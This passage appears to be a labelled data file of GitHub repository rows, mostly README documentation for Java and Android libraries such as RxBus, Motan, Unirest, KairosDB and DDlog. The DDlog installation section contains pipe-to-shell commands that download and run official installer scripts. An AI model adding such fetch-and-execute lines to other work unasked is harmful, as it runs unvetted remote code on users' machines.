- Recovery.getInstance()
- .debug(true)
- .recoverInBackground(false)
- .recoverStack(true)
- .mainPage(MainActivity.class)
- .recoverEnabled(true)
- .callback(new MyCrashCallback())
- .silent(false, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
- .skip(TestActivity.class)
- .init(this);
-```
-
-If you don't want to show the RecoveryActivity when the application crashes at runtime, you can use silent recovery to restore your application.
-
-You can use this code sample to enable silent recovery in your application:
-
-```java
- Recovery.getInstance()
- .debug(true)
- .recoverInBackground(false)
- .recoverStack(true)
- .mainPage(MainActivity.class)
- .recoverEnabled(true)
- .callback(new MyCrashCallback())
- .silent(true, Recovery.SilentMode.RECOVER_ACTIVITY_STACK)
- .skip(TestActivity.class)
- .init(this);
-```
-
-If you only need the 'RecoveryActivity' page in development builds to obtain debug data, and don't want it displayed in release builds, set `recoverEnabled(false)`.
-
-## **Arguments**
-
-| Argument | Type | Function |
-| :-: | :-: | :-: |
-| debug | boolean | Whether to enable debug mode |
-| recoverInBackground | boolean | Whether to restore the stack when the App is in the background |
-| recoverStack | boolean | Whether to restore the whole activity stack, or only the top activity |
-| mainPage | Class | Initial page activity |
-| callback | RecoveryCallback | Crash info callback |
-| silent | boolean,SilentMode | 
Whether to use silent recovery; if true, the RecoveryActivity is not displayed and the activity stack is restored automatically |
-
-**SilentMode**
-> 1. RESTART - Restart App
-> 2. RECOVER_ACTIVITY_STACK - Restore the activity stack
-> 3. RECOVER_TOP_ACTIVITY - Restore the top activity
-> 4. RESTART_AND_CLEAR - Restart App and clear data
-
-## **Callback**
-
-```java
-public interface RecoveryCallback {
-
- void stackTrace(String stackTrace);
-
- void cause(String cause);
-
- void exception(
- String throwExceptionType,
- String throwClassName,
- String throwMethodName,
- int throwLineNumber
- );
-
- void throwable(Throwable throwable);
-}
-```
-
-## **Custom Theme**
-
-You can customize the UI by setting these properties in your styles file:
-
-```xml
- #2E2E36
- #2E2E36
- #BDBDBD
- #3C4350
- #FFFFFF
- #C6C6C6
-```
-
-## **Crash File Path**
-> {SDCard Dir}/Android/data/{packageName}/files/recovery_crash/
-
-----
-## **Update history**
-* `VERSION-0.0.5`——**Support silent recovery**
-* `VERSION-0.0.6`——**Strengthen the protection of silent recovery mode**
-* `VERSION-0.0.7`——**Add ProGuard (obfuscation) configuration**
-* `VERSION-0.0.8`——**Add the skip-Activity feature, method: skip()**
-* `VERSION-0.0.9`——**Update the UI and fix some problems**
-* `VERSION-0.1.0`——**Optimize crash exception delivery so the Recovery framework can be initialized anywhere; release the official version 0.1.0**
-* `VERSION-0.1.3`——**Add 'no-op' support**
-* `VERSION-0.1.4`——**Update default theme**
-* `VERSION-0.1.5`——**Fix 8.0+ hook bug**
-* `VERSION-0.1.6`——**Update**
-* `VERSION-1.0.0`——**Fix 8.0 compatibility issue**
-
-## **About**
-* **Blog**:[https://zhengxiaoyong.com](https://zhengxiaoyong.com)
-* **Wechat**:
-
-![](https://raw.githubusercontent.com/Sunzxyong/ImageRepository/master/qrcode.jpg)
-# **LICENSE**
-
-```
- Copyright 2016 zhengxiaoyong
-
- Licensed under the Apache License, Version 2.0 (the ""License"");
- you may not use this file except in compliance with the License. 
- You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -``` - -",0 -hanks-zyh/SmallBang, twitter like animation for any view :heartbeat:,2015-12-24T14:48:37Z,,"# SmallBang - -twitter like animation for any view :heartbeat: - - - -[Demo APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true) - -## Usage - -```groovy -dependencies { - implementation 'pub.hanks:smallbang:1.2.2' -} -``` - -```xml - - - - -``` -or - -```xml - - - - - -``` -## Donate - -If this project help you reduce time to develop, you can give me a cup of coffee :) - -[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG) - - - -## Contact & Help - -Please fell free to contact me if there is any problem when using the library. - -- **email**: zhangyuhan2014@gmail.com -- **twitter**: https://twitter.com/zhangyuhan3030 -- **weibo**: http://weibo.com/hanksZyh -- **blog**: http://hanks.pub - -welcome to commit [issue](https://github.com/hanks-zyh/SmallBang/issues) & [pr](https://github.com/hanks-zyh/SmallBang/pulls) - - ---- -## License - -This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). - -See [`LICENSE`](LICENSE) for full of the license text. - - Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh) - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. 
- You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -AndroidKnife/RxBus,Event Bus By RxJava.,2015-11-25T10:36:57Z,,"RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid) -============================= -This is an event bus designed to allowing your application to communicate efficiently. - -I have use it in many projects, and now i think maybe someone would like it, so i publish it. - -RxBus support annotations(@produce/@subscribe), and it can provide you to produce/subscribe on other thread -like MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, even the EXECUTOR and HANDLER thread, -more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java). - -Also RxBus provide the event tag to define the event. The method's first (and only) parameter and tag defines the event type. 
- -**Thanks to:** - -[square/otto](https://github.com/square/otto) - -[greenrobot/EventBus](https://github.com/greenrobot/EventBus) - -Usage --------- - -Just 2 Steps: - -**STEP 1** - -Add dependency to your gradle file: -```groovy -compile 'com.hwangjr.rxbus:rxbus:3.0.0' -``` -Or maven: -``` xml - - com.hwangjr.rxbus - rxbus - 3.0.0 - aar - -``` - -**TIP:** Maybe you also use the [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your message, you may need to exclude the timber (from version 1.0.4, timber dependency update from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton): -``` groovy -compile ('com.hwangjr.rxbus:rxbus:3.0.0') { - exclude group: 'com.jakewharton.timber', module: 'timber' -} -``` -en -Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/). - -**STEP 2** - -Just use the provided(Any Thread Enforce): -``` java -com.hwangjr.rxbus.RxBus -``` -Or make RxBus instance is a better choice: -``` java -public static final class RxBus { - private static Bus sBus; - - public static synchronized Bus get() { - if (sBus == null) { - sBus = new Bus(); - } - return sBus; - } -} -``` - -Add the code where you want to produce/subscribe events, and register and unregister the class. -``` java -public class MainActivity extends AppCompatActivity { - ... - - @Override - protected void onCreate(Bundle savedInstanceState) { - ... - RxBus.get().register(this); - ... - } - - @Override - protected void onDestroy() { - ... - RxBus.get().unregister(this); - ... 
- } - - @Subscribe - public void eat(String food) { - // purpose - } - - @Subscribe( - thread = EventThread.IO, - tags = { - @Tag(BusAction.EAT_MORE) - } - ) - public void eatMore(List foods) { - // purpose - } - - @Produce - public String produceFood() { - return ""This is bread!""; - } - - @Produce( - thread = EventThread.IO, - tags = { - @Tag(BusAction.EAT_MORE) - } - ) - public List produceMoreFood() { - return Arrays.asList(""This is breads!""); - } - - public void post() { - RxBus.get().post(this); - } - - public void postByTag() { - RxBus.get().post(Constants.EventType.TAG_STORY, this); - } - ... -} -``` - -**That is all done!** - -Lint --------- - -Features --------- -* JUnit test -* Docs - -History --------- -Here is the [CHANGELOG](CHANGELOG.md). - -FAQ --------- -**Q:** How to do pull requests?
-**A:** Ensure good code quality and consistent formatting. - -License --------- - - Copyright 2015 HwangJR, Inc. - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -lealone/Lealone,比 MySQL 和 MongoDB 快10倍的 OLTP 关系数据库和文档数据库,2013-01-08T13:57:08Z,," -### Lealone 是什么 - -* 是一个高性能的面向 OLTP 场景的关系数据库 - -* 也是一个兼容 MongoDB 的高性能文档数据库 - -* 同时还高度兼容 MySQL 和 PostgreSQL 的协议和 SQL 语法 - - -### Lealone 有哪些特性 - -##### 高亮特性 - -* 并发写性能极其炸裂 - -* 全链路异步化,使用少量线程就能处理大量并发 - -* 可暂停的、渐进式的 SQL 引擎 - -* 基于 SQL 优先级的抢占式调度,慢查询不会长期霸占 CPU - -* 创建 JDBC 连接非常快速,占用资源少,不再需要 JDBC 连接池 - -* 插件化存储引擎架构,内置 AOSE 引擎,采用新颖的异步化 B-Tree - -* 插件化事务引擎架构,事务处理逻辑与存储分离,内置 AOTE 引擎 - -* 支持 Page 级别的行列混合存储,对于有很多字段的表,只读少量字段时能大量节约内存 - -* 支持通过 CREATE SERVICE 语句创建可托管的后端服务 - -* 只需要一个不到 2M 的 jar 包就能运行,不需要安装 - - -##### 普通特性 - -* 支持索引、视图、Join、子查询、触发器、自定义函数、Order By、Group By、聚合 - - -##### 云服务版 - -* 支持高性能分布式事务、支持强一致性复制、支持全局快照隔离 - -* 支持自动化分片 (Sharding),用户不需要关心任何分片的规则,没有热点,能够进行范围查询 - -* 支持混合运行模式,包括4种模式: 嵌入式、Client/Server 模式、复制模式、Sharding 模式 - -* 支持不停机快速手动或自动转换运行模式: Client/Server 模式 -> 复制模式 -> Sharding 模式 - - -### Lealone 文档 - -* [快速入门](https://github.com/lealone/Lealone-Docs/blob/master/应用文档/Lealone数据库快速入门.md) - -* [文档首页](https://github.com/lealone/Lealone-Docs) - - -### Lealone 插件 - -* 兼容 MongoDB、MySQL、PostgreSQL 的插件 - -* [插件首页](https://github.com/lealone-plugins) - - -### Lealone 微服务框架 - -* 非常新颖的基于数据库技术实现的微服务框架,开发分布式微服务应用跟开发单体应用一样简单 - -* 
[微服务框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-%E5%BE%AE%E6%9C%8D%E5%8A%A1%E6%A1%86%E6%9E%B6) - - -### Lealone ORM 框架 - -* 超简洁的类型安全的 ORM 框架,不需要配置文件和注解 - -* [ORM 框架文档](https://github.com/lealone/Lealone-Docs/blob/master/%E5%BA%94%E7%94%A8%E6%96%87%E6%A1%A3/%E5%BE%AE%E6%9C%8D%E5%8A%A1%E5%92%8CORM%E6%A1%86%E6%9E%B6%E6%96%87%E6%A1%A3.md#lealone-orm-%E6%A1%86%E6%9E%B6) - - -### Lealone 名字的由来 - -* Lealone 发音 ['li:ləʊn] 这是我新造的英文单词,
- 灵感来自于办公桌上那些叫绿萝的室内植物,一直想做个项目以它命名。
- 绿萝的拼音是 lv luo,与 Lealone 英文发音有点相同,
- Lealone 是 lea + lone 的组合,反过来念更有意思哦。:) - - -### Lealone 历史 - -* 2012年从 [H2 数据库 ](http://www.h2database.com/html/main.html)的代码开始 - -* [Lealone 的过去现在将来](https://github.com/codefollower/My-Blog/issues/16) - - -### [Lealone License](https://github.com/lealone/Lealone/blob/master/LICENSE.md) - -",0 -weibocom/motan,A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.,2016-04-20T10:56:17Z,,"# Motan - -[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE) -[![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan) -[![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan) -[![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io) -[![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking) - -# Overview - -Motan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services. - -Related projects in Motan ecosystem: - -- [Motan-go](https://github.com/weibocom/motan-go) is golang implementation. -- [Motan-PHP](https://github.com/weibocom/motan-php) is PHP client can interactive with Motan server directly or through Motan-go agent. -- [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua(Luajit) implementation based on [Openresty](http://openresty.org). - -# Features - -- Create distributed services without writing extra code. -- Provides cluster support and integrate with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper]. 
-- Supports advanced scheduling features like weighted load-balance, scheduling cross IDCs, etc. -- Optimization for high load scenarios, provides high availability in production environment. -- Supports both synchronous and asynchronous calls. -- Support cross-language interactive with Golang, PHP, Lua(Luajit), etc. - -# Quick Start - -The quick start gives very basic example of running client and server on the same machine. For the detailed information about using and developing Motan, please jump to [Documents](#documents). - -> The minimum requirements to run the quick start are: -> -> - JDK 1.8 or above -> - A java-based project management software like [Maven][maven] or [Gradle][gradle] - -## Synchronous calls - -1. Add dependencies to pom. - -```xml - - 1.1.12 - - - - com.weibo - motan-core - ${motan.version} - - - com.weibo - motan-transport-netty - ${motan.version} - - - - - com.weibo - motan-springsupport - ${motan.version} - - - org.springframework - spring-context - 4.2.4.RELEASE - - -``` - -2. Create an interface for both service provider and consumer. - - `src/main/java/quickstart/FooService.java` - - ```java - package quickstart; - - public interface FooService { - public String hello(String name); - } - ``` - -3. Write an implementation, create and start RPC Server. 
- - `src/main/java/quickstart/FooServiceImpl.java` - - ```java - package quickstart; - - public class FooServiceImpl implements FooService { - - public String hello(String name) { - System.out.println(name + "" invoked rpc service""); - return ""hello "" + name; - } - } - ``` - - `src/main/resources/motan_server.xml` - - ```xml - - - - - - - - - ``` - - `src/main/java/quickstart/Server.java` - - ```java - package quickstart; - - import org.springframework.context.ApplicationContext; - import org.springframework.context.support.ClassPathXmlApplicationContext; - - public class Server { - - public static void main(String[] args) throws InterruptedException { - ApplicationContext applicationContext = new ClassPathXmlApplicationContext(""classpath:motan_server.xml""); - System.out.println(""server start...""); - } - } - ``` - - Execute main function in Server will start a motan server listening on port 8002. - -4. Create and start RPC Client. - - `src/main/resources/motan_client.xml` - - ```xml - - - - - - - ``` - - `src/main/java/quickstart/Client.java` - - ```java - package quickstart; - - import org.springframework.context.ApplicationContext; - import org.springframework.context.support.ClassPathXmlApplicationContext; - - - public class Client { - - public static void main(String[] args) throws InterruptedException { - ApplicationContext ctx = new ClassPathXmlApplicationContext(""classpath:motan_client.xml""); - FooService service = (FooService) ctx.getBean(""remoteService""); - System.out.println(service.hello(""motan"")); - } - } - ``` - - Execute main function in Client will invoke the remote service and print response. - -## Asynchronous calls - -1. Based on the `Synchronous calls` example, add `@MotanAsync` annotation to interface `FooService`. - - ```java - package quickstart; - import com.weibo.api.motan.transport.async.MotanAsync; - - @MotanAsync - public interface FooService { - public String hello(String name); - } - ``` - -2. 
Include the plugin into the POM file to set `target/generated-sources/annotations/` as source folder. - - ```xml - - org.codehaus.mojo - build-helper-maven-plugin - 1.10 - - - generate-sources - - add-source - - - - ${project.build.directory}/generated-sources/annotations - - - - - - ``` - -3. Modify the attribute `interface` of referer in `motan_client.xml` from `FooService` to `FooServiceAsync`. - - ```xml - - ``` - -4. Start asynchronous calls. - - ```java - public static void main(String[] args) { - ApplicationContext ctx = new ClassPathXmlApplicationContext(new String[] {""classpath:motan_client.xml""}); - - FooServiceAsync service = (FooServiceAsync) ctx.getBean(""remoteService""); - - // sync call - System.out.println(service.hello(""motan"")); - - // async call - ResponseFuture future = service.helloAsync(""motan async ""); - System.out.println(future.getValue()); - - // multi call - ResponseFuture future1 = service.helloAsync(""motan async multi-1""); - ResponseFuture future2 = service.helloAsync(""motan async multi-2""); - System.out.println(future1.getValue() + "", "" + future2.getValue()); - - // async with listener - FutureListener listener = new FutureListener() { - @Override - public void operationComplete(Future future) throws Exception { - System.out.println(""async call "" - + (future.isSuccess() ? ""success! value:"" + future.getValue() : ""fail! 
exception:"" - + future.getException().getMessage())); - } - }; - ResponseFuture future3 = service.helloAsync(""motan async multi-1""); - ResponseFuture future4 = service.helloAsync(""motan async multi-2""); - future3.addListener(listener); - future4.addListener(listener); - } - ``` - - -# Documents - -- [Wiki](https://github.com/weibocom/motan/wiki) -- [Wiki(中文)](https://github.com/weibocom/motan/wiki/zh_overview) - -# Contributors - -- maijunsheng([@maijunsheng](https://github.com/maijunsheng)) -- fishermen([@hustfisher](https://github.com/hustfisher)) -- TangFulin([@tangfl](https://github.com/tangfl)) -- bodlyzheng([@bodlyzheng](https://github.com/bodlyzheng)) -- jacawang([@jacawang](https://github.com/jacawang)) -- zenglingshu([@zenglingshu](https://github.com/zenglingshu)) -- Sugar Zouliu([@lamusicoscos](https://github.com/lamusicoscos)) -- tangyang([@tangyang](https://github.com/tangyang)) -- olivererwang([@olivererwang](https://github.com/olivererwang)) -- jackael([@jackael9856](https://github.com/jackael9856)) -- Ray([@rayzhang0603](https://github.com/rayzhang0603)) -- r2dx([@half-dead](https://github.com/half-dead)) -- Jake Zhang([sunnights](https://github.com/sunnights)) -- axb([@qdaxb](https://github.com/qdaxb)) -- wenqisun([@wenqisun](https://github.com/wenqisun)) -- fingki([@fingki](https://github.com/fingki)) -- 午夜([@sumory](https://github.com/sumory)) -- guanly([@guanly](https://github.com/guanly)) -- Di Tang([@tangdi](https://github.com/tangdi)) -- 肥佬大([@feilaoda](https://github.com/feilaoda)) -- 小马哥([@andot](https://github.com/andot)) -- wu-sheng([@wu-sheng](https://github.com/wu-sheng))     _Assist Motan to become the first Chinese RPC framework on [OpenTracing](http://opentracing.io) **Supported Frameworks List**_ -- Jin Zhang([@lowzj](https://github.com/lowzj)) -- xiaoqing.yuanfang([@xiaoqing-yuanfang](https://github.com/xiaoqing-yuanfang)) -- 东方上人([@dongfangshangren](https://github.com/dongfangshangren)) -- 
Voyager3([@xxxxzr](https://github.com/xxxxzr)) -- yeluoguigen009([@yeluoguigen009](https://github.com/yeluoguigen009)) -- Michael Yang([@yangfuhai](https://github.com/yangfuhai)) -- Panying([@anylain](https://github.com/anylain)) - -# License - -Motan is released under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0). - -[maven]:https://maven.apache.org -[gradle]:http://gradle.org -[consul]:http://www.consul.io -[zookeeper]:http://zookeeper.apache.org -",0 -Kong/unirest-java,"Unirest in Java: Simplified, lightweight HTTP client library.",2011-04-11T21:19:53Z,,"# Unirest for Java - -[![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions) -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java) -[![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java) - - -## Unirest 4 -Unirest 4 is build on modern Java standards, and as such requires at least Java 11. - -Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions. -You can use a maven bom to manage the modules: - -### Install With Maven - -```xml - - - - - com.konghq - unirest-java-bom - 4.3.2 - pom - import - - - - - - - - com.konghq - unirest-java-core - - - - - - com.konghq - unirest-modules-gson - - - - - com.konghq - unirest-modules-jackson - - -``` - -#### 🚨 Attention JSON users 🚨 -Under Unirest 4, core no longer comes with ANY transient dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use Json objects. - - -## Upgrading from Previous Versions -See the [Upgrade Guide](UPGRADE_GUIDE.md) - -## ChangeLog -See the [Change Log](CHANGELOG.md) for recent changes. 
- -## Documentation -Our [Documentation](http://kong.github.io/unirest-java/) - -## Unirest 3 -### Maven -```xml - - - com.konghq - unirest-java - 3.14.1 - -``` -",0 -kairosdb/kairosdb,Fast scalable time series database,2013-02-05T22:27:48Z,,"![KairosDB](webroot/img/kairosdb.png) -[![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb) - -KairosDB is a fast distributed scalable time series database written on top of Cassandra. - -## Documentation - -Documentation is found [here](http://kairosdb.github.io/website/). - -[Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions) - -## Installing - -Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases). - -Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html) - -If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md). - -## Getting Involved - -Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group). - -## Contributing to KairosDB - -Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there's a lot of tasks for non-Java programmers too, so don't feel shy and join us! - -What you can do for KairosDB: - -- [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB. -- [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website. -- [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task. - -If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue. 
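Independent of contributing, the quickest smoke test of a fresh installation is to push a single data point through the REST API. The sketch below builds the JSON body that KairosDB's "add data points" endpoint (`/api/v1/datapoints`, default port 8080) expects; the metric name, tag, and host URL are illustrative placeholders — adjust them for your deployment.

```python
import json
import time

# Hypothetical endpoint: localhost with KairosDB's stock REST port.
KAIROSDB_URL = "http://localhost:8080/api/v1/datapoints"

def build_datapoints(metric, points, tags):
    """Build the JSON body for KairosDB's 'add data points' REST endpoint.

    points: iterable of (timestamp_ms, value) pairs.
    tags: dict of tag name -> value; KairosDB requires at least one tag.
    """
    return json.dumps([{
        "name": metric,
        "datapoints": [[ts_ms, value] for ts_ms, value in points],
        "tags": tags,
    }])

body = build_datapoints(
    "archive.file.tracked",                # illustrative metric name
    [(int(time.time() * 1000), 123.4)],    # timestamps are epoch milliseconds
    {"host": "server1"},
)

# To actually submit it (requires a running KairosDB instance):
# import urllib.request
# req = urllib.request.Request(KAIROSDB_URL, data=body.encode(),
#                              headers={"Content-Type": "application/json"})
# urllib.request.urlopen(req)  # the server answers 204 No Content on success
```

If the POST returns 204, ingestion is working and the metric should be queryable from the bundled web UI.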
- -## License -The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0) -",0 -vmware/differential-datalog,DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.,2018-03-20T20:14:11Z,,"[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) -[![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions) -[![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master) -[![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html) -[![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog) - -# Differential Datalog (DDlog) - -DDlog is a programming language for *incremental computation*. It is well suited for -writing programs that continuously update their output in response to input changes. With DDlog, -the programmer does not need to worry about writing incremental algorithms. -Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog. -The DDlog compiler then synthesizes an efficient incremental implementation. -DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/) -excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library. - -DDlog has the following key properties: - -1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations. 
-It is thus well suited for applications that operate on relational data, ranging from real-time analytics to -cloud management systems and static program analysis tools. - -2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations. -Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update -by outputting an update to its output relations. - -3. **Incremental**: DDlog processes input updates by performing the minimum amount of work -necessary to compute changes to output relations. This has significant performance benefits for many queries. - -4. **Bottom-up**: DDlog starts from a set of input facts and -computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In -contrast, top-down engines are optimized to answer individual user queries without computing all -possible facts ahead of time. For example, given a Datalog program that computes pairs of connected -vertices in a graph, a bottom-up engine maintains the set of all such pairs. A top-down engine, on -the other hand, is triggered by a user query to determine whether a pair of vertices is connected -and handles the query by searching for a derivation chain back to ground facts. The bottom-up -approach is preferable in applications where all derived facts must be computed ahead of time and in -applications where the cost of initial computation is amortized across a large number of queries. - -5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program -is used in conjunction with a persistent database, with database records being fed to DDlog as -ground facts and the derived facts computed by DDlog being written back to the database. - - At the moment, DDlog can only operate on databases that completely fit the memory of a single - machine. 
We are working on a distributed version of DDlog that will be able to - partition its state and computation across multiple machines. - -6. **Typed**: In its classical textbook form Datalog is more of a mathematical formalism than a -practical tool for programmers. In particular, pure Datalog does not have concepts like types, -arithmetics, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog -extends pure Datalog with: - - 1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings, - tuples, tagged unions, vectors, sets, and maps. All of these types can be - stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog - one can perform relational operations, such as joins, directly over structured data, - without having to flatten it first (as is often done in SQL databases). - - 2. Standard integer, bitvector, and floating point arithmetic. - - 3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions. - - 4. String operations, including string concatenation and interpolation. - - 5. Syntactic sugar for writing imperative-style code using for/let/assignments. - -7. **Integrated**: while DDlog programs can be run interactively via a command line interface, its -primary use case is to integrate with other applications that require deductive database -functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust, -C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance, -but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation. - -## Documentation - -- Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog. -- DDlog [language reference](doc/language_reference/language_reference.md). 
-- DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs. -- [How to](doc/java_api.md) use DDlog from Java. -- [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C. -- [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog). -- [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example) -- [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs -- [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019. - -## Installation - -### Installing DDlog from a binary release - -To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below). - -If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Else, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog: -``` -""ddlog"" cannot be opened because the developer cannot be verified. -macOS cannot verify that this app is free from malware. -``` - -You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). - -### Compiling DDlog from sources - -#### Installing dependencies manually - -- Haskell [stack](https://github.com/commercialhaskell/stack): - ``` - wget -qO- https://get.haskellstack.org/ | sh - ``` -- Rust toolchain v1.52.1 or later: - ``` - curl https://sh.rustup.rs -sSf | sh - . 
$HOME/.cargo/env - rustup component add rustfmt - rustup component add clippy - ``` - **Note:** The `rustup` script adds path to Rust toolchain binaries (typically, `$HOME/.cargo/bin`) - to `~/.profile`, so that it becomes effective at the next login attempt. To configure your current - shell run `source $HOME/.cargo/env`. -- JDK, e.g.: - ``` - apt install default-jdk - ``` -- Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from - [github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure - that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers - Java classes are in your `$CLASSPATH`: - ``` - ./tools/install-flatbuf.sh - cd flatbuffers - export CLASSPATH=`pwd`""/java"":$CLASSPATH - export PATH=`pwd`:$PATH - cd .. - ``` -- Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`, - `libdl.a`, `libgmp.a`, and `libstdc++.a` can be installed from distro-specific packages. On Ubuntu: - ``` - apt install libc6-dev libgmp-dev - ``` - On Fedora: - ``` - dnf install glibc-static gmp-static libstdc++-static - ``` - -#### Building - -To build the software once you've installed the dependencies using one of the -above methods, clone this repository and set `$DDLOG_HOME` variable to point -to the root of the repository. Run - -``` -stack build -``` - -anywhere inside the repository to build the DDlog compiler. -To install DDlog binaries in Haskell stack's default binary directory: - -``` -stack install -``` - -To install to a different location: - -``` -stack install --local-bin-path -``` - -To test basic DDlog 